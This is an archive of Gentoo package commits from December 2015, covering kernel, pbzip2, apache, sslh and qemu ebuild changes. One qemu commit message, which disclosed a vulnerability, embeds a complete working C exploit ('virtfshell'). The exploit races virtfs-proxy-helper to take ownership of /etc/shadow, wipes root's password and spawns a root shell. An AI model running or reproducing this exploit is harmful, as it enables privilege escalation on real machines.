 WHIRLPOOL 
163b4beed95a8eb1f0068c7c2fcfa4a294fd35072dd6b48aaebc079e8720ec9aabd6fc06edd32bbd79ab28d0ba943851aa5abafd8c5a564f40dcd9ee1665f485
 DIST patch-4.4-rc3.xz 6514956 SHA256 
41b73ce54efdde419218de2ca2b1bcc2bc135b5e33ab870e28eb328fca962855 SHA512 
08ac846d999c8997b24a85b316218dc27c0f4adb5ab38186668705e1ca06cb576e198c702eaaf97cdbfce4a6f69805765b63c16c97271dd702bab05708ac7897
 WHIRLPOOL 
bf01ded5974cfa6d1d887ea558ccd8b0deae88f2d8836614d0579ca25afd6a7aec1c726ee5c01506b33835f3f5c0cea5125a452969def053fda810299704658e
 DIST patch-4.4-rc4.xz 6583896 SHA256 
e2a1f4198c0f56b0fb9cdf7056a3efb5c99d117e6c55341b69f8e77c01bea450 SHA512 
45cfa607086fd41f37e374696042fed0c122449652282d334c3d72c808d609108e99eee538eb9a7529a0498986d31984fc3714a29bab01210548c07647fd8e83
 WHIRLPOOL 
78274ee4996eaf9951be09cf96c951617adf1e01c29284893720ba37bca1485e9182f8d7e237a288ef053d2a0160869898df39e9130d10c317c0d3ad91617684
+DIST patch-4.4-rc5.xz 6618504 SHA256 
d976f02cae338d12981c1d9479077379ac7b7b8210fa216549ca24c51b68d85a SHA512 
38f1d3b1999374850e7c857d35afeca38d7ae253face09cc689220b38aa0e87a53effcfee13ad6b821a0a7b8a1a9c0ab7a2c0b114d63dbf44f48a41f0c32483f
 WHIRLPOOL 
765f27ca1270a2d3b0d0013a34f71d3891742e57b18f641eacb1ba070abfa8928a7bea7b8e42717ac6568930e83db5c6d113bee40d0a46b17abfb03778b1c42e

diff --git a/sys-kernel/git-sources/git-sources-4.4_rc5.ebuild 
b/sys-kernel/git-sources/git-sources-4.4_rc5.ebuild
new file mode 100644
index 000..5b6ded7
--- /dev/null
+++ b/sys-kernel/git-sources/git-sources-4.4_rc5.ebuild
@@ -0,0 +1,40 @@
+# Copyright 1999-2015 Gentoo Foundation
+# Distributed under the terms of the GNU General Public License v2
+# $Id$
+
+EAPI="5"
+UNIPATCH_STRICTORDER="yes"
+K_NOUSENAME="yes"
+K_NOSETEXTRAVERSION="yes"
+K_NOUSEPR="yes"
+K_SECURITY_UNSUPPORTED="yes"
+K_BASE_VER="4.3"
+K_EXP_GENPATCHES_NOUSE="1"
+ETYPE="sources"
+CKV="${PVR/-r/-git}"
+
+# only use this if it's not an _rc/_pre release
+[ "${PV/_pre}" == "${PV}" ] && [ "${PV/_rc}" == "${PV}" ] && OKV="${PV}"
+inherit kernel-2
+detect_version
+
+DESCRIPTION="The very latest -git version of the Linux kernel"
+HOMEPAGE="https://www.kernel.org;
+SRC_URI="${KERNEL_URI}"
+
+KEYWORDS="~alpha ~amd64 ~arm ~arm64 ~hppa ~ia64 ~ppc ~ppc64 ~s390 ~sh ~sparc 
~x86"
+IUSE=""
+
+K_EXTRAEINFO="This kernel is not supported by Gentoo due to its unstable and
+experimental nature. If you have any issues, try a matching vanilla-sources
+ebuild -- if the problem is not there, please contact the upstream kernel
+developers at https://bugzilla.kernel.org and on the linux-kernel mailing list 
to
+report the problem so it can be fixed in time for the next kernel release."
+
+RDEPEND=""
+DEPEND="${RDEPEND}
+   >=sys-devel/patch-2.7.4"
+
+pkg_postinst() {
+   postinst_sources
+}



[gentoo-commits] repo/gentoo:master commit in: app-arch/pbzip2/

2015-12-14 Thread Lars Wendler
commit: 93db59aba9959fa1b0ccbc20dcd79c225b94cc80
Author: Lars Wendler  gentoo  org>
AuthorDate: Mon Dec 14 10:21:43 2015 +
Commit: Lars Wendler  gentoo  org>
CommitDate: Mon Dec 14 10:21:43 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=93db59ab

app-arch/pbzip2: Removed old.

Package-Manager: portage-2.2.26
Signed-off-by: Lars Wendler  gentoo.org>

 app-arch/pbzip2/Manifest|  1 -
 app-arch/pbzip2/pbzip2-1.1.8.ebuild | 43 -
 2 files changed, 44 deletions(-)

diff --git a/app-arch/pbzip2/Manifest b/app-arch/pbzip2/Manifest
index 972009f..5b76e3c 100644
--- a/app-arch/pbzip2/Manifest
+++ b/app-arch/pbzip2/Manifest
@@ -1,2 +1 @@
 DIST pbzip2-1.1.12.tar.gz 47826 SHA256 
573bb358a5a7d3bf5f42f881af324cedf960c786e8d66dd03d448ddd8a0166ee SHA512 
bb68e87867295b89ee6fb76a8b72834daebf0ca6c16b2f10bce67fe7386716a728acd28bf46a9732087202ca0cc774f02c741b0b58801184bb7550f6fd119cd6
 WHIRLPOOL 
e7e9cd45b51aaf227e5bcb6e8df37b2fc05b2e3b8b666fcf213e05dc21d6df7392918e97d95379d25231832a9cfae938fdf5590ae7a7d3e6ad1968a9b2c25393
-DIST pbzip2-1.1.8.tar.gz 54429 SHA256 
d2da7e65d2a2ba5426d6d9bcd15d86cc5f90038efabd5dbc1ef9bded21371f53 SHA512 
a3314d1f465e6016bf79ca8bd734fc1485515e9688319ee5a6a837058599546848018f28e2e2cef2afde68ee8f3c26d16e4e6da4c74c75d1cb12068f1d1e1a83
 WHIRLPOOL 
bd24e6102db6425978c5ac8e762b37f4df4bcdcc84f44e06e6b4c652b1f9e3128382af1558a1ebc9f68dba3a89be08d42bf92577eab73b3d748f6ff941b415bf

diff --git a/app-arch/pbzip2/pbzip2-1.1.8.ebuild 
b/app-arch/pbzip2/pbzip2-1.1.8.ebuild
deleted file mode 100644
index d60507c..000
--- a/app-arch/pbzip2/pbzip2-1.1.8.ebuild
+++ /dev/null
@@ -1,43 +0,0 @@
-# Copyright 1999-2014 Gentoo Foundation
-# Distributed under the terms of the GNU General Public License v2
-# $Id$
-
-EAPI=4
-
-inherit flag-o-matic eutils
-
-DESCRIPTION="Parallel bzip2 (de)compressor using libbz2"
-HOMEPAGE="http://compression.ca/pbzip2/;
-SRC_URI="https://launchpad.net/pbzip2/${PV:0:3}/${PV}/+download/${P}.tar.gz;
-
-LICENSE="BZIP2"
-SLOT="0"
-KEYWORDS="alpha amd64 arm arm64 hppa ia64 m68k ~mips ppc ppc64 s390 sh sparc 
x86 ~x86-fbsd ~amd64-linux ~x86-linux ~ppc-macos"
-IUSE="static symlink"
-
-LIB_DEPEND="app-arch/bzip2[static-libs(+)]"
-RDEPEND="
-   !static? ( ${LIB_DEPEND//\[static-libs(+)]} )
-   symlink? ( !app-arch/lbzip2[symlink] )"
-DEPEND="${RDEPEND}
-   static? ( ${LIB_DEPEND} )"
-
-src_prepare() {
-   epatch "${FILESDIR}"/${PN}-1.1.6-makefile.patch
-   tc-export CXX
-   use static && append-ldflags -static
-}
-
-src_install() {
-   dobin pbzip2
-   dodoc AUTHORS ChangeLog README
-   doman pbzip2.1
-   dosym pbzip2 /usr/bin/pbunzip2
-
-   if use symlink ; then
-   local s
-   for s in bzip2 bunzip2 bzcat ; do
-   dosym pbzip2 /usr/bin/${s}
-   done
-   fi
-}



[gentoo-commits] repo/gentoo:master commit in: app-arch/pbzip2/, app-arch/pbzip2/files/

2015-12-14 Thread Lars Wendler
commit: a00cf04f5b8d1c2b284c21cf3670b0d1a1a9ac51
Author: Lars Wendler  gentoo  org>
AuthorDate: Mon Dec 14 10:20:56 2015 +
Commit: Lars Wendler  gentoo  org>
CommitDate: Mon Dec 14 10:20:56 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=a00cf04f

app-arch/pbzip2: Revbump to fix possible data corruption (#567952).

Package-Manager: portage-2.2.26
Signed-off-by: Lars Wendler  gentoo.org>

 .../files/pbzip2-1.1.12-data_truncation_fix.patch  | 142 +
 app-arch/pbzip2/pbzip2-1.1.12-r1.ebuild|  44 +++
 2 files changed, 186 insertions(+)

diff --git a/app-arch/pbzip2/files/pbzip2-1.1.12-data_truncation_fix.patch 
b/app-arch/pbzip2/files/pbzip2-1.1.12-data_truncation_fix.patch
new file mode 100644
index 000..0ce62e7
--- /dev/null
+++ b/app-arch/pbzip2/files/pbzip2-1.1.12-data_truncation_fix.patch
@@ -0,0 +1,142 @@
+https://bugs.launchpad.net/pbzip2/+bug/1524909
+https://bugs.gentoo.org/567952
+
+
+=== modified file 'pbzip2.cpp'
+--- pbzip2.cpp 2014-12-21 10:20:27 +
 pbzip2.cpp 2015-12-11 00:14:31 +
+@@ -2083,6 +2083,17 @@
+   return 0;
+ }
+ 
++void close_streams(FILE *stream, FILE *zStream)
++{
++  if (stream != NULL)
++  fflush(stream);
++
++  if (zStream != NULL && zStream != stdin)
++  fclose(zStream);
++  if (stream != NULL && stream != stdout)
++  fclose(stream);
++}
++
+ /*
+  *
+  */
+@@ -2125,9 +2136,7 @@
+   // check file stream for errors
+   if (ferror(zStream))
+   {
+-  if (zStream != stdin)
+-  fclose(zStream);
+-
++  close_streams(stream, zStream);
+   handle_error(EF_EXIT, -1,
+   "pbzip2: *ERROR: Problem with input stream of 
file [%s]!  Aborting...\n", InFilename);
+   return -1;
+@@ -2155,9 +2164,7 @@
+   // check file stream for errors
+   if (ferror(stream))
+   {
+-  if (stream != stdout)
+-  fclose(stream);
+-  
++  close_streams(stream, zStream);
+   handle_error(EF_EXIT, -1,
+   "pbzip2: *ERROR: Problem with output stream of 
file [%s]!  Aborting...\n", InFilename);
+   return -1;
+@@ -2169,10 +2176,7 @@
+   if (syncGetTerminateFlag() != 0)
+   {
+   fprintf (stderr, "directdecompress: terminating1 - 
terminateFlag set\n");
+-  if (zStream != stdin)
+-  fclose(zStream);
+-  if (stream != stdout)
+-  fclose(stream);
++  close_streams(stream, zStream);
+   return -1;
+   }
+ 
+@@ -2180,11 +2184,8 @@
+   if (bzf == NULL || bzerr != BZ_OK)
+   {
+   ret = testBZ2ErrorHandling(bzerr, bzf, streamNo);
+-  if (zStream != stdin)
+-  fclose(zStream);
+-  if (stream != stdout)
+-  fclose(stream);
+-  
++  close_streams(stream, zStream);
++  
+   if (ret != 0)
+   {
+   syncSetTerminateFlag(1);
+@@ -2200,10 +2201,7 @@
+   if (syncGetTerminateFlag() != 0)
+   {
+   fprintf (stderr, "directdecompress: 
terminating2 - terminateFlag set\n");
+-  if (zStream != stdin)
+-  fclose(zStream);
+-  if (stream != stdout)
+-  fclose(stream);
++  close_streams(stream, zStream);
+   return -1;
+   }
+ 
+@@ -2225,11 +2223,8 @@
+   if (ferror(zStream))
+   {
+   ret = 
testBZ2ErrorHandling(bzerr, bzf, streamNo);
+-  if (zStream != stdin)
+-  fclose(zStream);
+-  if (stream != stdout)
+-  fclose(stream);
+-  
++  close_streams(stream, 
zStream);
++
+   if (ret != 0)
+   {
+   
syncSetTerminateFlag(1);
+@@ -2242,11 +2237,8 @@
+   

[gentoo-commits] repo/gentoo:master commit in: www-servers/apache/

2015-12-14 Thread Lars Wendler
commit: a740d93a05bf8823ebaac41ecbb0e55c1bc4c824
Author: Lars Wendler  gentoo  org>
AuthorDate: Mon Dec 14 12:39:37 2015 +
Commit: Lars Wendler  gentoo  org>
CommitDate: Mon Dec 14 12:39:37 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=a740d93a

www-servers/apache: Raised minimum required version of nghttp2

to version 1.2.1 as reuqested in bug #568224

Package-Manager: portage-2.2.26
Signed-off-by: Lars Wendler  gentoo.org>

 www-servers/apache/apache-2.4.18.ebuild | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/www-servers/apache/apache-2.4.18.ebuild 
b/www-servers/apache/apache-2.4.18.ebuild
index b4e5f03..85a4862 100644
--- a/www-servers/apache/apache-2.4.18.ebuild
+++ b/www-servers/apache/apache-2.4.18.ebuild
@@ -125,7 +125,7 @@ LICENSE="Apache-2.0 Apache-1.1"
 SLOT="2"
 KEYWORDS="~alpha ~amd64 ~arm ~arm64 ~hppa ~ia64 ~mips ~ppc ~ppc64 ~s390 ~sh 
~sparc ~x86 ~amd64-fbsd ~sparc-fbsd ~x86-fbsd ~amd64-linux ~x64-macos 
~x86-macos ~m68k-mint ~sparc64-solaris ~x64-solaris"
 
-DEPEND+="apache2_modules_http2? ( >=net-libs/nghttp2-1.0.0 )"
+DEPEND+="apache2_modules_http2? ( >=net-libs/nghttp2-1.2.1 )"
 
 pkg_setup() {
# dependend critical modules which are not allowed in global scope due



[gentoo-commits] repo/gentoo:master commit in: app-emulation/qemu/

2015-12-14 Thread Jason Donenfeld
commit: 183dd7394703b49c7af441a9c4227b4b91453510
Author: Jason A. Donenfeld  gentoo  org>
AuthorDate: Mon Dec 14 10:31:21 2015 +
Commit: Jason Donenfeld  gentoo  org>
CommitDate: Mon Dec 14 11:12:01 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=183dd739

app-emulation/qemu: critical security fix

The virtfs-proxy-helper program is not a safe binary to give caps.
The following exploit code demonstrates the vulnerability:

~=~=~=~= snip ~=~=~=~=

/* == virtfshell ==
 *
 * Some distributions make virtfs-proxy-helper from QEMU either SUID or
 * give it CAP_CHOWN fs capabilities. This is a terrible idea. While
 * virtfs-proxy-helper makes some sort of flimsy check to make sure
 * its socket path doesn't already exist, it is vulnerable to TOCTOU.
 *
 * This should spawn a root shell eventually on vulnerable systems.
 *
 * - zx2c4
 * 2015-12-12
 *
 *
 * zx2c4@thinkpad ~ $ lsb_release -i
 * Distributor ID: Gentoo
 * zx2c4  thinkpad ~ $ ./virtfshell
 * == Virtfshell - by zx2c4 ==
 * [+] Beginning race loop
 * [+] Chown'd /etc/shadow, elevating to root
 * [+] Cleaning up
 * [+] Spawning root shell
 * thinkpad zx2c4 # whoami
 * root
 *
 */

 #include 
 #include 
 #include 
 #include 
 #include 
 #include 
 #include 
 #include 

static int it_worked(void)
{
struct stat sbuf = { 0 };
stat("/etc/shadow", );
return sbuf.st_uid == getuid() && sbuf.st_gid == getgid();
}

int main(int argc, char **argv)
{
int fd;
pid_t pid;
char uid[12], gid[12];

sprintf(uid, "%d", getuid());
sprintf(gid, "%d", getgid());

printf("== Virtfshell - by zx2c4 ==\n");

printf("[+] Beginning race loop\n");

while (!it_worked()) {
fd = inotify_init();
unlink("/tmp/virtfshell/sock");
mkdir("/tmp/virtfshell", 0777);
inotify_add_watch(fd, "/tmp/virtfshell", IN_CREATE);
pid = fork();
if (!pid) {
close(0);
close(1);
close(2);
execlp("virtfs-proxy-helper", "virtfs-proxy-helper", 
"-n", "-p", "/tmp", "-u", uid, "-g", gid, "-s", "/tmp/virtfshell/sock", NULL);
_exit(1);
}
read(fd, 0, 0);
unlink("/tmp/virtfshell/sock");
symlink("/etc/shadow", "/tmp/virtfshell/sock");
close(fd);
kill(pid, SIGKILL);
wait(NULL);
}

printf("[+] Chown'd /etc/shadow, elevating to root\n");

system( "cp /etc/shadow /tmp/original_shadow;"
"sed 's/^root:.*/root/' /etc/shadow > 
/tmp/modified_shadow;"
"cat /tmp/modified_shadow > /etc/shadow;"
"su -c '"
"   echo [+] Cleaning up;"
"   cat /tmp/original_shadow > /etc/shadow;"
"   chown root:root /etc/shadow;"
"   rm /tmp/modified_shadow /tmp/original_shadow;"
"   echo [+] Spawning root shell;"
"   exec /bin/bash -i"
"'");
return 0;
}

 app-emulation/qemu/qemu-2.3.0-r7.ebuild   | 612 
 app-emulation/qemu/qemu-2.3.1-r1.ebuild   | 598 +++
 app-emulation/qemu/qemu-2.4.0-r2.ebuild   | 640 +
 app-emulation/qemu/qemu-2.4.0.1-r2.ebuild | 645 ++
 4 files changed, 2495 insertions(+)

diff --git a/app-emulation/qemu/qemu-2.3.0-r7.ebuild 
b/app-emulation/qemu/qemu-2.3.0-r7.ebuild
new file mode 100644
index 000..b49f43c
--- /dev/null
+++ b/app-emulation/qemu/qemu-2.3.0-r7.ebuild
@@ -0,0 +1,612 @@
+# Copyright 1999-2015 Gentoo Foundation
+# Distributed under the terms of the GNU General Public License v2
+# $Id$
+
+EAPI=5
+
+PYTHON_COMPAT=( python2_7 )
+PYTHON_REQ_USE="ncurses,readline"
+
+inherit eutils flag-o-matic linux-info toolchain-funcs multilib python-r1 \
+   user udev fcaps readme.gentoo pax-utils
+
+BACKPORTS=
+
+if [[ ${PV} = ** ]]; then
+   EGIT_REPO_URI="git://git.qemu.org/qemu.git"
+   inherit git-2
+   SRC_URI=""
+else
+   SRC_URI="http://wiki.qemu-project.org/download/${P}.tar.bz2
+   ${BACKPORTS:+
+   
https://dev.gentoo.org/~cardoe/distfiles/${P}-${BACKPORTS}.tar.xz};
+   KEYWORDS="~amd64 ~ppc ~ppc64 ~x86 ~x86-fbsd"
+fi
+
+DESCRIPTION="QEMU + Kernel-based Virtual Machine userland tools"
+HOMEPAGE="http://www.qemu.org http://www.linux-kvm.org;
+
+LICENSE="GPL-2 LGPL-2 BSD-2"
+SLOT="0"
+IUSE="accessibility +aio alsa bluetooth +caps +curl debug +fdt glusterfs \
+gtk gtk2 infiniband iscsi +jpeg \
+kernel_linux kernel_FreeBSD lzo ncurses nfs nls numa opengl +pin-upstream-blobs
++png pulseaudio python \
+rbd sasl +seccomp sdl selinux smartcard snappy spice ssh static static-softmmu 
\
+static-user systemtap 

[gentoo-commits] repo/gentoo:master commit in: net-misc/sslh/

2015-12-14 Thread Mike Frysinger
commit: ddd6ade52aae53d29552d00824572cde1dfa3533
Author: Mike Frysinger  gentoo  org>
AuthorDate: Tue Dec 15 03:48:00 2015 +
Commit: Mike Frysinger  gentoo  org>
CommitDate: Tue Dec 15 03:48:05 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=ddd6ade5

net-misc/sslh: depend on help2man for man page generation

 net-misc/sslh/sslh-1.17.ebuild | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

diff --git a/net-misc/sslh/sslh-1.17.ebuild b/net-misc/sslh/sslh-1.17.ebuild
index 8f458c2..98aea7a 100644
--- a/net-misc/sslh/sslh-1.17.ebuild
+++ b/net-misc/sslh/sslh-1.17.ebuild
@@ -19,7 +19,8 @@ IUSE="caps tcpd"
 RDEPEND="caps? ( sys-libs/libcap )
tcpd? ( sys-apps/tcp-wrappers )
dev-libs/libconfig"
-DEPEND="${RDEPEND}"
+DEPEND="${RDEPEND}
+   sys-apps/help2man"
 
 RESTRICT="test"
 



[gentoo-commits] repo/gentoo:master commit in: net-misc/sslh/, net-misc/sslh/files/

2015-12-14 Thread Mike Frysinger
commit: 6a58b258d4077ae3f17fd08b7f867f8e308b6ada
Author: Mike Frysinger  gentoo  org>
AuthorDate: Tue Dec 15 03:47:48 2015 +
Commit: Mike Frysinger  gentoo  org>
CommitDate: Tue Dec 15 03:48:05 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=6a58b258

net-misc/sslh: fix parallel build failure w/version.h usage

 net-misc/sslh/files/sslh-1.17-version-deps.patch | 13 +
 net-misc/sslh/sslh-1.17.ebuild   |  6 +-
 2 files changed, 18 insertions(+), 1 deletion(-)

diff --git a/net-misc/sslh/files/sslh-1.17-version-deps.patch 
b/net-misc/sslh/files/sslh-1.17-version-deps.patch
new file mode 100644
index 000..c05b87a
--- /dev/null
+++ b/net-misc/sslh/files/sslh-1.17-version-deps.patch
@@ -0,0 +1,13 @@
+make sure the files using version.h depend on it being generated first
+
+--- a/Makefile
 b/Makefile
+@@ -39,7 +39,7 @@
+ 
+ all: sslh $(MAN) echosrv
+ 
+-.c.o: *.h
++.c.o: *.h version.h
+   $(CC) $(CFLAGS) $(CPPFLAGS) -c $<
+ 
+ version.h:

diff --git a/net-misc/sslh/sslh-1.17.ebuild b/net-misc/sslh/sslh-1.17.ebuild
index b6a3380..8f458c2 100644
--- a/net-misc/sslh/sslh-1.17.ebuild
+++ b/net-misc/sslh/sslh-1.17.ebuild
@@ -5,7 +5,7 @@
 EAPI=5
 
 MY_P="${PN}-v${PV}"
-inherit toolchain-funcs
+inherit toolchain-funcs eutils
 
 DESCRIPTION="Port multiplexer - accept both HTTPS and SSH connections on the 
same port"
 HOMEPAGE="http://www.rutschle.net/tech/sslh.shtml;
@@ -25,6 +25,10 @@ RESTRICT="test"
 
 S=${WORKDIR}/${MY_P}
 
+src_prepare() {
+   epatch "${FILESDIR}"/${P}-version-deps.patch
+}
+
 src_compile() {
emake \
CC="$(tc-getCC)" \



[gentoo-commits] repo/gentoo:master commit in: app-emulation/qemu/

2015-12-14 Thread Mike Frysinger
commit: 359bcd793b5d0507b496cfb4125eaea0c0137de5
Author: Mike Frysinger  gentoo  org>
AuthorDate: Tue Dec 15 05:42:28 2015 +
Commit: Mike Frysinger  gentoo  org>
CommitDate: Tue Dec 15 05:55:01 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=359bcd79

app-emulation/qemu: drop virtfs-proxy-helper fcaps from all versions #568226

 app-emulation/qemu/qemu-2.3.0-r5.ebuild   | 4 
 app-emulation/qemu/qemu-2.3.0-r6.ebuild   | 4 
 app-emulation/qemu/qemu-2.3.1.ebuild  | 4 
 app-emulation/qemu/qemu-2.4.0-r1.ebuild   | 4 
 app-emulation/qemu/qemu-2.4.0.1-r1.ebuild | 4 
 app-emulation/qemu/qemu-2.4.0.1.ebuild| 4 
 app-emulation/qemu/qemu-2.4.1-r1.ebuild   | 4 
 app-emulation/qemu/qemu-2.4.1.ebuild  | 4 
 app-emulation/qemu/qemu-.ebuild   | 4 
 9 files changed, 36 deletions(-)

diff --git a/app-emulation/qemu/qemu-2.3.0-r5.ebuild 
b/app-emulation/qemu/qemu-2.3.0-r5.ebuild
index 04f938e..9e0cf4f 100644
--- a/app-emulation/qemu/qemu-2.3.0-r5.ebuild
+++ b/app-emulation/qemu/qemu-2.3.0-r5.ebuild
@@ -595,10 +595,6 @@ pkg_postinst() {
fi
 
fcaps cap_net_admin /usr/libexec/qemu-bridge-helper
-   if use virtfs && [ -n "${softmmu_targets}" ]; then
-   local 
virtfs_caps="cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_setgid,cap_mknod,cap_setuid"
-   fcaps ${virtfs_caps} /usr/bin/virtfs-proxy-helper
-   fi
 }
 
 pkg_info() {

diff --git a/app-emulation/qemu/qemu-2.3.0-r6.ebuild 
b/app-emulation/qemu/qemu-2.3.0-r6.ebuild
index 753395d..b49f43c 100644
--- a/app-emulation/qemu/qemu-2.3.0-r6.ebuild
+++ b/app-emulation/qemu/qemu-2.3.0-r6.ebuild
@@ -596,10 +596,6 @@ pkg_postinst() {
fi
 
fcaps cap_net_admin /usr/libexec/qemu-bridge-helper
-   if use virtfs && [ -n "${softmmu_targets}" ]; then
-   local 
virtfs_caps="cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_setgid,cap_mknod,cap_setuid"
-   fcaps ${virtfs_caps} /usr/bin/virtfs-proxy-helper
-   fi
 }
 
 pkg_info() {

diff --git a/app-emulation/qemu/qemu-2.3.1.ebuild 
b/app-emulation/qemu/qemu-2.3.1.ebuild
index bfd96d8..d3349e4 100644
--- a/app-emulation/qemu/qemu-2.3.1.ebuild
+++ b/app-emulation/qemu/qemu-2.3.1.ebuild
@@ -582,10 +582,6 @@ pkg_postinst() {
fi
 
fcaps cap_net_admin /usr/libexec/qemu-bridge-helper
-   if use virtfs && [ -n "${softmmu_targets}" ]; then
-   local 
virtfs_caps="cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_setgid,cap_mknod,cap_setuid"
-   fcaps ${virtfs_caps} /usr/bin/virtfs-proxy-helper
-   fi
 }
 
 pkg_info() {

diff --git a/app-emulation/qemu/qemu-2.4.0-r1.ebuild 
b/app-emulation/qemu/qemu-2.4.0-r1.ebuild
index cc05df3..ad8c85d 100644
--- a/app-emulation/qemu/qemu-2.4.0-r1.ebuild
+++ b/app-emulation/qemu/qemu-2.4.0-r1.ebuild
@@ -624,10 +624,6 @@ pkg_postinst() {
fi
 
fcaps cap_net_admin /usr/libexec/qemu-bridge-helper
-   if use virtfs && [ -n "${softmmu_targets}" ]; then
-   local 
virtfs_caps="cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_setgid,cap_mknod,cap_setuid"
-   fcaps ${virtfs_caps} /usr/bin/virtfs-proxy-helper
-   fi
 }
 
 pkg_info() {

diff --git a/app-emulation/qemu/qemu-2.4.0.1-r1.ebuild 
b/app-emulation/qemu/qemu-2.4.0.1-r1.ebuild
index 38e2bb2..1e99f54 100644
--- a/app-emulation/qemu/qemu-2.4.0.1-r1.ebuild
+++ b/app-emulation/qemu/qemu-2.4.0.1-r1.ebuild
@@ -629,10 +629,6 @@ pkg_postinst() {
fi
 
fcaps cap_net_admin /usr/libexec/qemu-bridge-helper
-   if use virtfs && [ -n "${softmmu_targets}" ]; then
-   local 
virtfs_caps="cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_setgid,cap_mknod,cap_setuid"
-   fcaps ${virtfs_caps} /usr/bin/virtfs-proxy-helper
-   fi
 }
 
 pkg_info() {

diff --git a/app-emulation/qemu/qemu-2.4.0.1.ebuild 
b/app-emulation/qemu/qemu-2.4.0.1.ebuild
index 61703f8..e57f5ea 100644
--- a/app-emulation/qemu/qemu-2.4.0.1.ebuild
+++ b/app-emulation/qemu/qemu-2.4.0.1.ebuild
@@ -624,10 +624,6 @@ pkg_postinst() {
fi
 
fcaps cap_net_admin /usr/libexec/qemu-bridge-helper
-   if use virtfs && [ -n "${softmmu_targets}" ]; then
-   local 
virtfs_caps="cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_setgid,cap_mknod,cap_setuid"
-   fcaps ${virtfs_caps} /usr/bin/virtfs-proxy-helper
-   fi
 }
 
 pkg_info() {

diff --git a/app-emulation/qemu/qemu-2.4.1-r1.ebuild 
b/app-emulation/qemu/qemu-2.4.1-r1.ebuild
index 6e3ff9a..32539dd 100644
--- a/app-emulation/qemu/qemu-2.4.1-r1.ebuild
+++ b/app-emulation/qemu/qemu-2.4.1-r1.ebuild
@@ -624,10 +624,6 @@ pkg_postinst() {
fi
 
fcaps cap_net_admin /usr/libexec/qemu-bridge-helper
-   if use virtfs && [ -n "${softmmu_targets}" ]; then
-   local 
virtfs_caps="cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_setgid,cap_mknod,cap_setuid"
- 

[gentoo-commits] repo/gentoo:master commit in: app-emulation/qemu/files/, app-emulation/qemu/

2015-12-14 Thread Mike Frysinger
commit: 75d0202d68b81bc06d451b574670d8374751789f
Author: Mike Frysinger  gentoo  org>
AuthorDate: Tue Dec 15 05:43:01 2015 +
Commit: Mike Frysinger  gentoo  org>
CommitDate: Tue Dec 15 05:55:01 2015 +
URL:https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=75d0202d

app-emulation/qemu: add upstream fixes for #567828 #568214

 .../qemu/files/qemu-2.4.1-CVE-2015-7549.patch  |  62 ++
 .../qemu/files/qemu-2.4.1-CVE-2015-8504.patch  |  46 ++
 app-emulation/qemu/qemu-2.4.1-r2.ebuild| 642 +
 3 files changed, 750 insertions(+)

diff --git a/app-emulation/qemu/files/qemu-2.4.1-CVE-2015-7549.patch 
b/app-emulation/qemu/files/qemu-2.4.1-CVE-2015-7549.patch
new file mode 100644
index 000..897fe34
--- /dev/null
+++ b/app-emulation/qemu/files/qemu-2.4.1-CVE-2015-7549.patch
@@ -0,0 +1,62 @@
+https://bugs.gentoo.org/568214
+
+From 43b11a91dd861a946b231b89b7542856ade23d1b Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?Marc-Andr=C3=A9=20Lureau?= 
+Date: Fri, 26 Jun 2015 14:25:29 +0200
+Subject: [PATCH] msix: implement pba write (but read-only)
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+qpci_msix_pending() writes on pba region, causing qemu to SEGV:
+
+  Program received signal SIGSEGV, Segmentation fault.
+  [Switching to Thread 0x77fba8c0 (LWP 25882)]
+  0x in ?? ()
+  (gdb) bt
+  #0  0x in  ()
+  #1  0x556556c5 in memory_region_oldmmio_write_accessor 
(mr=0x579f3f80, addr=0, value=0x7fffbf68, size=4, shift=0, 
mask=4294967295, attrs=...) at /home/elmarco/src/qemu/memory.c:434
+  #2  0x556558e1 in access_with_adjusted_size (addr=0, 
value=0x7fffbf68, size=4, access_size_min=1, access_size_max=4, 
access=0x5565563e , 
mr=0x579f3f80, attrs=...) at /home/elmarco/src/qemu/memory.c:506
+  #3  0x556581eb in memory_region_dispatch_write (mr=0x579f3f80, 
addr=0, data=0, size=4, attrs=...) at /home/elmarco/src/qemu/memory.c:1176
+  #4  0x5560b6f9 in address_space_rw (as=0x55eff4e0 
, addr=3759147008, attrs=..., buf=0x7fffc1b0 "", 
len=4, is_write=true) at /home/elmarco/src/qemu/exec.c:2439
+  #5  0x5560baa2 in cpu_physical_memory_rw (addr=3759147008, 
buf=0x7fffc1b0 "", len=4, is_write=1) at /home/elmarco/src/qemu/exec.c:2534
+  #6  0x5564c005 in cpu_physical_memory_write (addr=3759147008, 
buf=0x7fffc1b0, len=4) at 
/home/elmarco/src/qemu/include/exec/cpu-common.h:80
+  #7  0x5564cd9c in qtest_process_command (chr=0x5642b890, 
words=0x578de4b0) at /home/elmarco/src/qemu/qtest.c:378
+  #8  0x5564db77 in qtest_process_inbuf (chr=0x5642b890, 
inbuf=0x5641b340) at /home/elmarco/src/qemu/qtest.c:569
+  #9  0x5564dc07 in qtest_read (opaque=0x5642b890, 
buf=0x7fffc2e0 "writel 0xe0100800 0x0\n", size=22) at 
/home/elmarco/src/qemu/qtest.c:581
+  #10 0x5574ce3e in qemu_chr_be_write (s=0x5642b890, 
buf=0x7fffc2e0 "writel 0xe0100800 0x0\n", len=22) at qemu-char.c:306
+  #11 0x55751263 in tcp_chr_read (chan=0x5642bcf0, cond=G_IO_IN, 
opaque=0x5642b890) at qemu-char.c:2876
